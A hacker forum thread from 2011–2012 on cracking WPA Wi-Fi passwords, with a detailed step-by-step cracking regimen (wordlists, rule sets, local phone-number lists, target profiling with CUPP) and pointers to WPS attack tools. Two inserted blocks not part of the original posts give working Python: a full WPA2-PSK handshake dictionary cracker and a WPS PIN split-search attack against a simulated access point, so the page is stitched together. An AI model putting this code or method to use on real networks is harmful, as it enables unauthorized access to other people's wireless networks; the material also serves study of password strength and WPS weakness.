
Anyone tried WPA dictionaries with success


10 replies to this topic

#1 bardolph

bardolph

    DDP Fan club member

  • Members
  • 50 posts
  • Gender:Male

Posted 17 September 2011 - 01:42 PM

Without pre-including the password, of course.

#2 TheFunk

TheFunk

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 29 September 2011 - 10:29 AM

Without pre-including the password I've never had any success with WPA dictionaries. Not to mention the fact that if someone is smart enough to use WPA encryption, they're more than likely also smart enough to not use a dictionary word as their password. I've been looking into brute-force methods recently, and while there don't seem to be very many promising options, you might want to look into something called pyrit. It utilizes your GPU, which, assuming you have an alright graphics card, means you just might be able to crack that password after all.

Edited by TheFunk, 29 September 2011 - 10:31 AM.


#3 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 29 September 2011 - 02:42 PM

WPA's becoming standard, man. Don't count it as a sign of smarts.

#4 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 30 September 2011 - 11:42 AM

Even with hardware acceleration, WPA/WPA2 is a bitch for brute-forcing. When was the last time anyone in here has brute-forced something over 9 chars (even with CUDA/ATI STREAM acceleration)? I've cracked a 9-char MD5 hash once. It was all alpha, and MD5 w/o a salt is nothing compared to WPA/WPA2 keys. Hardware acceleration on consumer products, like video cards, is best used for mangling wordlists for WPA/WPA2.

I've been able to crack a few WPA keys. I usually use this method and systems with the following hardware/software:

Machine 1: Windows 7 64-bit
Q9550 quad core OC'd to 3.7 GHz
2x Radeon 5850s
8GB DDR3
Elcomsoft Wireless Security Auditor (supports ATI STREAM acceleration as well as CUDA)
Elcomsoft Distributed Cracking Tool (CUDA and ATI STREAM support)

Machine 2: iMac, Mac OS X
3.2 GHz Core 2 Duo
8GB DDR3
Aircrack-ng and JtR (John the Ripper, using a custom ruleset I made just for cracking WPA)
CUPP = a tool written in Python to make custom password lists

Machine 3: Windows 7
Core i7 @ 4.2 GHz
2x Asus GTX 460s
8GB DDR3
Elcomsoft Wireless Security Auditor
Elcomsoft Distributed Cracking Tool (CUDA and STREAM support)

1) Use a huge wordlist of dictionary words
2) Brute-force 10 numerics
3) Max out rules on Elcomsoft Wireless Security Auditor with a small wordlist
4) Small wordlist with custom JtR rules
5) Medium wordlist with minimal rules on Elcomsoft Wireless Security Auditor
6) Medium wordlist with custom JtR rules
7) 1337 speak and other custom dicts not covered in Elcomsoft or JtR rulesets
8) Collect information on the target and use CUPP to create some custom wordlists
9) Forget about computers for a while, because at this point, with advanced rules and huge dictionaries, all systems are busy for a few days.
10) After a day or two of nothing on larger lists with large rule sets, I usually just stop. This kind of stress puts a lot of wear on systems.

EDIT: I also make a custom list, using Passwords Pro, of every phone number with the local area code.

Edited by tekio, 30 September 2011 - 11:45 AM.
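
The procedure above, carried through in working code, as an added example that is not tekio's tooling and not code from the thread: a minimal WPA2-PSK dictionary cracker in Python. It derives the PMK with PBKDF2-HMAC-SHA1, expands it to the PTK with the 802.11i PRF, and checks a handshake MIC for every candidate, with the candidate stream built the way the post orders it (dictionary words, simple rules, then phone numbers in one area code). The SSID "linksys", the MAC addresses, the nonces, the area code and the "captured" MIC are all constructed in the file from a known passphrase so it runs offline; the EAPOL frame is a bare message 2 with no key data.

```python
"""Added example (not tekio's tooling): a minimal WPA2-PSK dictionary cracker.

Two points from the post are visible in the code: every candidate costs a
PBKDF2-HMAC-SHA1 with 4096 iterations before the handshake MIC can be checked,
and the candidate list (words with rules, then local phone numbers) does the
real work, not raw brute force.  The "captured" handshake is constructed here
from a known passphrase so the example runs offline; nothing is a real capture.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Constructed handshake parameters (hypothetical SSID, MACs and nonces).
SSID = "linksys"
MAC_AP = bytes.fromhex("001122334455")
MAC_STA = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(0, 32))
SNONCE = bytes(range(32, 64))
HMACS_PER_CANDIDATE = 4096 * 2   # a 32-byte PBKDF2 output from SHA-1 needs 2 blocks


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096) -> 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 over the 4-way handshake inputs; returns the 64-byte PTK."""
    data = (min(mac_ap, mac_sta) + max(mac_ap, mac_sta)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """EAPOL-Key message 2 (RSN descriptor, key descriptor version 2, no key data)."""
    body = struct.pack(">BHH", 2, 0x010A, 0)            # descriptor type, key info, key length
    body += struct.pack(">Q", 1)                        # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)    # nonce, key IV, RSC, key ID
    body += mic + struct.pack(">H", 0)                  # MIC, key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL version 2, type EAPOL-Key


def mic_for(passphrase: str, frame_mic_zeroed: bytes) -> bytes:
    """MIC recomputed per candidate: HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, MAC_AP, MAC_STA, ANONCE, SNONCE)[:16]   # KCK = first 128 bits of PTK
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]


def candidates(base_words: Iterable[str], area_code: str, exchange: str,
               lines: range) -> Iterable[str]:
    """Candidate order in the spirit of the post: words, simple rules, then phone numbers."""
    suffixes = ["", "1", "123", "2011"]
    leet = str.maketrans("aeios", "43105")
    for w in base_words:
        for s in suffixes:
            yield w + s
            yield w.capitalize() + s
            yield w.translate(leet) + s
    # Every number in one area code is 10^7 candidates (about 8 * 10^10 HMAC-SHA1);
    # the caller picks an exchange and a line range to keep this example fast.
    for n in lines:
        yield f"{area_code}{exchange}{n:04d}"


def crack_psk(captured_mic: bytes, frame_mic_zeroed: bytes, cands: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MIC matches the captured one, or None."""
    for pw in cands:
        if not 8 <= len(pw) <= 63:        # WPA passphrase length limits; skip before the PBKDF2
            continue
        if hmac.compare_digest(mic_for(pw, frame_mic_zeroed), captured_mic):
            return pw
    return None


if __name__ == "__main__":
    frame = eapol_msg2(SNONCE)
    # Constructed "capture": the MIC the client would have sent for this passphrase.
    captured = mic_for("Password2011", frame)
    hit = crack_psk(captured, frame, candidates(["linksys", "password"], "206", "555", range(100)))
    print("recovered:", hit)
```

The cost per candidate is what separates this from the MD5 case in the post: each guess is 4096 iterations over two PBKDF2 blocks, 8192 HMAC-SHA1 computations, before a single 16-byte compare. A full 10-digit numeric space is 10^10 guesses, and 9 lowercase letters is 26^9, about 5.4 x 10^12, so even GPU-class throughput only pays off when the candidate list is small and well targeted. Tools such as pyrit, oclhashcat or the Elcomsoft auditor do exactly this computation on the GPU; the frame layout here omits the RSN key data that a real message 2 carries, which changes nothing about the MIC procedure.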


#5 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 30 September 2011 - 01:23 PM

tekio, on 30 September 2011 - 11:42 AM, said:
> (post #4 quoted in full)

I'm jelly of your hardware.

#6 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 30 September 2011 - 06:29 PM

Your best shot is if they used their phone number and you have a goddamned titan PC like tekio. (Personally I'm partial to CUDA, but it's your call, and I'm certainly not one to complain if you've got a system decked out so beautifully, let alone three!)

#7 TheFunk

TheFunk

    SUP3R 31337

  • Members
  • 181 posts
  • Country:
  • Gender:Male

Posted 02 October 2011 - 04:32 PM

tekio said:
> Even with hardware acceleration, WPA/WPA2 is a bitch for brute-forcing. When was the last time anyone in here has brute-forced something over 9 chars (even with CUDA/ATI STREAM acceleration)? I've cracked a 9-char MD5 hash once. It was all alpha, and MD5 w/o a salt is nothing compared to WPA/WPA2 keys. Hardware acceleration on consumer products, like video cards, is best used for mangling wordlists for WPA/WPA2.

1- You have sweet hardware.

2- Have you tried rainbow tables for MD5? I have a set of tables that work really well; they only go up to 9 characters, like you managed to crack, but still. I believe the tables are alphanumeric.

To the original poster, I occasionally toy around with oclhashcat, which allows for hybrid cracking (use of a wordlist and brute-forcing together); it's possible that you might be able to use hashcat to crack WPA passwords. I'm not sure though; I'm not entirely familiar with the software yet.

#8 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,068 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 02 October 2011 - 05:21 PM


TheFunk, on 02 October 2011 - 04:32 PM, said:
> (quoting the first paragraph of tekio's post #4)
>
> 1- You have sweet hardware.
>
> 2- Have you tried rainbow tables for MD5? I have a set of tables that work really well; they only go up to 9 characters, like you managed to crack, but still. I believe the tables are alphanumeric.

1) Thank you. I'm probably a little older than most in here, and have a career. So, I buy some toys, since I work my ass off (albeit from home mostly) 6 days a week and am on call 24/7.

2) Yes, I do. I have a set of 9-char alpha with a space and they are huge... I've got quite a few tables... Earlier there was a topic in here about rainbow table trading. It motivated me to stock up on them. :)

#9 Castlewall

Castlewall

    Will I break 10 posts?

  • Members
  • 5 posts
  • Country:
  • Gender:Male

Posted 06 January 2012 - 11:50 PM

We can say that's not easy for beginners, am I right? :dry:

#10 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 28 January 2012 - 12:40 AM

Castlewall said:
> We can say that's not easy for beginners, am I right? :dry:

Wrapping your brain around rainbow tables can be tough at first.
http://en.wikipedia....i/Rainbow_table

_THIS_ is easy:
http://code.google.com/p/reaver-wps/

Attacking WPS is easier than cracking WEP, IMHO.
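
Why WPS is the easy route, as an added example in Python that is not reaver's code and not from the thread: the PIN space an online attack of reaver's kind actually has to search. It assumes two facts from the WPS specification that the post does not state: the eighth PIN digit is a checksum over the first seven, and the registrar exchange acknowledges the first four digits separately from the last three. The access point is a simulated oracle built from a known PIN, so nothing here touches a real device or network.

```python
"""Added example (not reaver's code): why an online WPS PIN attack needs at most
about 11,000 guesses instead of 10^8.

Assumed from the WPS specification (not stated in the thread): the 8th PIN digit
is a checksum over the first seven, and the registrar exchange confirms the
first four digits separately from the last three.  The access point below is a
simulated oracle built from a known PIN; no real device or traffic is involved.
"""
from typing import Callable, Optional, Tuple


def wps_checksum(first7: int) -> int:
    """Checksum digit for a 7-digit PIN body, as computed by WPS registrars."""
    accum = 0
    n = first7
    for i in range(7):
        # Weights alternate 3,1,3,1,... starting from the rightmost digit.
        accum += (3 if i % 2 == 0 else 1) * (n % 10)
        n //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin8: int) -> bool:
    """True if the 8-digit PIN's last digit matches the checksum of the first seven."""
    return 0 <= pin8 <= 99_999_999 and pin8 % 10 == wps_checksum(pin8 // 10)


def simulated_ap(true_pin: int) -> Tuple[Callable[[int], bool], Callable[[int], bool]]:
    """Two oracles modelling what the protocol leaks: whether the first half
    (4 digits) is right, and whether the full PIN is right."""
    assert wps_pin_valid(true_pin)
    half1_ok = lambda h1: h1 == true_pin // 10_000
    full_ok = lambda pin: pin == true_pin
    return half1_ok, full_ok


def split_search(half1_ok: Callable[[int], bool],
                 full_ok: Callable[[int], bool]) -> Tuple[Optional[int], int]:
    """Search the halves independently; returns (pin or None, guesses made)."""
    guesses = 0
    first = None
    for h1 in range(10_000):                     # first half: 4 free digits
        guesses += 1
        if half1_ok(h1):
            first = h1
            break
    if first is None:
        return None, guesses
    for h2 in range(1_000):                      # second half: 3 free digits, checksum derived
        guesses += 1
        pin = first * 10_000 + h2 * 10 + wps_checksum(first * 1_000 + h2)
        if full_ok(pin):
            return pin, guesses
    return None, guesses


def worst_case_guesses() -> int:
    """Upper bound for the split search: every first half, then every second half."""
    return 10_000 + 1_000


def valid_pin_space() -> int:
    """Number of 8-digit PINs that pass the checksum (one free digit removed from 10^8)."""
    return 10 ** 7


if __name__ == "__main__":
    pin, n = split_search(*simulated_ap(12345670))
    print(f"recovered {pin:08d} after {n} guesses (worst case {worst_case_guesses()})")
```

The contrast with the WPA example is the search space, not the hash: a WPA guess is offline and expensive, while a WPS guess is cheap but online, one registrar exchange per attempt, so rate limiting or lockout on the access point is the only thing that decides how long the 11,000 guesses take. That is also why digitalchameleon's caveat below holds: an AP with WPS disabled or locked after failed attempts is not exposed to this at all.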

#11 digitalchameleon

digitalchameleon

    Will I break 10 posts?

  • Members
  • 9 posts
  • Country:
  • Gender:Male

Posted 13 March 2012 - 12:33 PM

True, but not every AP is vulnerable to WPS cracking. I have had limited success with WPA dictionary attacks. Once by brute-forcing an 8-digit numeric key, but it took too long.



